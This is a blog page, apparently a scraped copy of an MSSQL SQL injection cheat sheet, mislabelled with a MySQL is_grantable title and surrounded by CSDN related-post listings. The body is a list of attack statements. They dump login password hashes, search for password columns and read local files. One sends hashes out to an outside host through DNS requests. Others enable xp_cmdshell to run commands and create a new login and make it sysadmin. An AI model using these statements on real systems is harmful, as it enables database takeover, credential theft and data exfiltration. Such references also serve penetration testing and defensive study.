mysql is_grantable_各类型数据库注入时的一些语句

最新推荐文章于 2021-02-07 08:13:56 发布
最新推荐文章于 2021-02-07 08:13:56 发布
阅读量203 收藏
点赞数
文章标签: mysql is_grantable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30999669/article/details/113592205
版权

VersionSELECT @@version

CommentsSELECT 1 -- comment

SELECT /*comment*/1

Current UserSELECT user_name();

SELECT system_user;

SELECT user;

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List UsersSELECT name FROM master..syslogins

List Password HashesSELECT name, password FROM master..sysxlogins -- priv, mssql 2000;

SELECT

name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins --

priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL

error message / some version of query analyzer.

SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;

SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005

Password CrackerMSSQL 2000 and 2005 Hashes are both SHA1-based.  phrasen|drescher can crack these.

List PrivilegesImpossible?

List DBA AccountsTODO

SELECT

is_srvrolemember('sysadmin'); -- is your account a sysadmin?  returns 1

for true, 0 for false, NULL for invalid role.  Also try 'bulkadmin',

'systemadmin' and other values from the documentation SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.

Current DatabaseSELECT DB_NAME()

List DatabasesSELECT name FROM master..sysdatabases;

SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

List ColumnsSELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only

SELECT

master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM

master..syscolumns, master..sysobjects WHERE

master..syscolumns.id=master..sysobjects.id AND

master..sysobjects.name='sometable'; -- list colum names and types for

master..sometable

List TablesSELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views

SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

SELECT

master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM

master..syscolumns, master..sysobjects WHERE

master..syscolumns.id=master..sysobjects.id AND

master..sysobjects.name='sometable'; -- list colum names and types for

master..sometable

Find Tables From Column Name--

NB: This example works only for the current database.  If you wan't to

search another db, you need to specify the db name (e.g. replace

sysobject with mydb..sysobjects).

SELECT sysobjects.name as

tablename, syscolumns.name as columnname FROM sysobjects JOIN

syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype =

'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column

for each column containing the word 'password'

Select Nth RowSELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row

Select Nth CharSELECT substring('abcd', 3, 1) -- returns c

Bitwise ANDSELECT 6 & 2 -- returns 2

SELECT 6 & 1 -- returns 0

ASCII Value -> CharSELECT char(0x41) -- returns A

Char -> ASCII ValueSELECT ascii('A') - returns 65

CastingSELECT CAST('1' as int);

SELECT CAST(1 as char)

String ConcatenationSELECT 'A' + 'B' - returns AB

If StatementIF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Avoiding QuotesSELECT char(65)+char(66) -- returns AB

Time DelayWAITFOR DELAY '0:0:5' -- pause for 5 seconds

Make DNS Requestsdeclare @host varchar(800); select @host = name FROM master..syslogins;

exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); --

nonpriv, works on 2000

declare @host varchar(800); select

@host = name + '-' + master.sys.fn_varbintohexstr(password_hash) +

'.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' +

@host + '\c$\boot.ini'''); -- priv, works on 2005

-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.

-- Also check out theDNS tunnel feature of sqlninja

Command ExecutionEXEC xp_cmdshell 'net user'; -- priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:

EXEC sp_configure 'show advanced options', 1; -- priv

RECONFIGURE; -- priv

EXEC sp_configure 'xp_cmdshell', 1; -- priv

RECONFIGURE; -- priv

Local File AccessCREATE TABLE mydata (line varchar(8000));

BULK INSERT mydata FROM 'c:\boot.ini';

DROP TABLE mydata;

Hostname, IP AddressSELECT HOST_NAME()

Create UsersEXEC sp_addlogin 'user', 'pass'; -- priv

Drop UsersEXEC sp_droplogin 'user'; -- priv

Make User DBAEXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv

Location of DB filesTODO

Default/System Databasesnorthwind

model

msdb

pubs

tempdb

花旗甲比丹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql is_grantable_SCHEMA_PRIVILEGES
weixin_42322686的博客
02-01 763
该表提供查询关于库级别的权限信息,每种类型的库级别权限记录一行信息该表中的信息来自mysql.db表该表为Memory引擎临表表定义语句CREATE TEMPORARY TABLE `SCHEMA_PRIVILEGES` (`GRANTEE` varchar(81) NOT NULL DEFAULT '',`TABLE_CATALOG` varchar(512) NOT NULL DEFAULT...
mysql.zip_MYSQL数据库_MYSQL连接_mysql database_数据库 mysql_没有mysql
09-23
MySQL数据库是世界上最受欢迎的开源关系型数据库之一,它以其高效、稳定和易用性而闻名。MySQL被广泛应用于Web应用程序,因为它能够快速处理大量数据,同保持较低的系统资源消耗。在本文中,我们将深入探讨MySQL...
mysql is_grantable_接手线上Mysql服务器,我们需要做什么?
weixin_39745013的博客
01-20 123
作为系统管理人员,当我们接手之前是其他人在维护的MySQL服务器我们需要做什么?我个人的经验是要多看、多记、多思考,尽量避免在不熟悉服务的情况下进行操作。那么,我们应该看哪些东西,记哪些东西呢?结合网上一些文章与自己的切身体会,总结为以下几点:1、首先我们要进入数据库/usr/local/mysql/bin/mysql -uroot -p2、查看MySQL数据库的状态信息,包括平台、版本及字符集...
mysql is_grantable_跪求数据库高手帮忙错误您的 SQL 查询可能有错。如果可能的话,以下会列出 MySQL 服务器的错误输出,这可能对您解决问题有一定的帮助作用。 ERROR: 引号...
weixin_29331689的博客
02-01 365
满意答案jlove56742013.12.21采纳率:56%等级:8已帮助:157人把你的sql語句給我看下. 追问: ERROR: 引号不配对 @ 447 STR: ` SQL: -- -------------------------------------------------------- -- -- ???ṹ `COLUMN_PRIVILEGES` -- CREATE T...
mysql grantable_MySQL权限系统
weixin_42390873的博客
02-07 114
MySQL权限系统1)设置口令设置MySQL用户口令的方法有多种:–CREATE USER...IDENTIFIED BY–GRANT...IDENTIFIED BY–SET PASSWORD–mysqladmin password–UPDATE授权表(不推荐)为所有用户帐户分配唯一的强口令。?避免可以轻易猜测到的口令。?使用以下SELECT语句可列出没有口令的所有帐户:SELECT Host, ...
HDFS权限
叁木大数据
09-08 2037
HDFS权限 一、HDFS权限简介 Hdfs的权限管理分为2大部分: 第一部分类似于Linux的基本权限管理,也就是粗粒度将管理对象分为user、group和other三类去进行权限的管理。 第二部分是ACL方式的权限管理,也是更加细粒度的权限管理,可以精确控制到某个user与某个group具有的对应权限上。 注:hadoop2.4.0版本开始支持hdfs的ACL 二、HDFS 基本权限管理 2.1 初始目录权限 当我们创建文件或者目录的候可以指定权限,没有指定的话就会使用默认的权限。 文件默认权限:
mysql_java_interce.rar_java 数据库_java 查找 数据库
09-23
本项目“mysql_java_interce.rar”提供了一个实现这一功能的实例,包含增加、删除和查找数据库记录的基本操作。接下来,我们将深入探讨相关知识点。 1. **Java数据库连接(JDBC)**: JDBC是Java API,它为Java...
mysql_test.zip_MYSQL_mysql数据库 C++
09-22
2. **连接数据库**:使用`sql::mysql::MySQL_Driver::get_instance()`获取数据库驱动实例,然后通过`sql::Connection`对象创建到MySQL服务器的连接。连接通常需要服务器地址(IP或域名)、端口号、用户名、密码和...
Mysql.rar_php class_php mysql_php 类_php数据库_php连接数据库
09-21
这个"php_mysql_php 类"就是这样一个面向对象的数据库处理类,它封装了数据库连接、查询、更新等操作,使得代码更易于理解和维护。 在PHP中,创建一个MySQL数据库连接通常涉及`mysqli_connect()`或`PDO_MYSQL`函数...
JDBC.rar_MYSQL_MYSQL  数据类型_jdbc_jdbc mysql
09-20
"JDBC.rar_MYSQL_MYSQL 数据类型_jdbc_jdbc mysql" 这个压缩包文件显然聚焦于JDBC与MySQL数据库之间的数据类型对应关系,这对于开发涉及数据库操作的Java应用是基础且关键的知识。 首先,我们需要理解JDBC是什么。...
postgresql用户模式权限介绍
热门推荐
Brent的专栏
06-12 2万+
一.USER用户管理1.查看用户pg中的role,user,group基本是一样的,只是默认创建的role,group没有登录数据库的权限.用户分为普通用户和超级用户1.使用\du查看数据库中的用户,其中role name是用户名,第二列是用户的属性,第三列表示用户具有哪些成员,例如将suq赋予给brent postgres=# \du                               ...
MySQL权限控制的设计缺陷?
追风刀·丁奇
01-18 255
这个问题是从被问到information_schema.user_privilege的IS_GRANTABLE字段问题开始查起的,就先从user_privilege表的显示规则说起。   1、              IS_GRANTABLE字段 用root账号执行如下语句(本文中grant后都接flush privileges, 不赘述) a) grant all privile...
22. SCHEMA_PRIVILEGES
风中清淡
08-19 1185
22. SCHEMA_PRIVILEGES SCHEMA_PRIVILEGES表提供有关schema(数据库)特权的信息。它从mysql.db系统表中获取其值。 SCHEMA_PRIVILEGES表有以下列: GRANTEE :授予权限的帐户的名称,格式为“user_name”@“host_name”。 TABLE_CATALOG :schema所属目录的名称。该值始终为d...
PostgreSQL的权限查询
opendba的专栏
09-02 2494
查看哪些用户对表t1有哪些权限:part00=# /z t1                           Access privileges Schema | Name | Type  |  Access privileges  | Column access privileges --------+------+-------+---------------------+-------------------------- public | t1   | table | osdba=arwdDxt
mysql shell 查看 所有用户的 授权列表
youcharming的专栏
04-29 1万+
[root@localhost ~]# mysql -h localhost -u root -p  Enter password:  Welcome to the MySQL monitor.  Commands end with ; or \g. Your MySQL connection id is 166476 Server version: 5.6.25 MySQL Commun
MYSQL-INFORMATION_SCHEMA信息数据库(MYSQL注入猜解)
Quantum Intelligence
08-07 5522
MYSQL ROOT权限注入候需要用到的系统表 ....通过以下这些表就可以猜解到有那些库 有那些表 有那些字段最后猜解数据....目录23.1. INFORMATION_SCHEMA表 23.1.1. INFORMATION_SCHEMA SCHEMATA表 23.1.2. INFORMATION_SCHEMA TABLES表 23.1.3. INFORMATION_SCHEMA C
PostgreSQL 权限信息表information_schema.table_privileges
luojinbai的专栏
04-23 6205
information_schema.table_privileges表记录着所有用户的权限信息。postgres=# \d+ information_schema.table_privileges View "information_schema.table_privileges" Column | Typ
mysql_select_db连接当前数据库
最新发布
03-27
接下来,使用mysql_query函数执行查询语句,并使用mysql_fetch_assoc函数处理查询结果。最后,使用mysql_close函数关闭数据库连接。 需要注意的是,mysql_select_db函数只是选择了当前数据库连接,并没有真正地连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值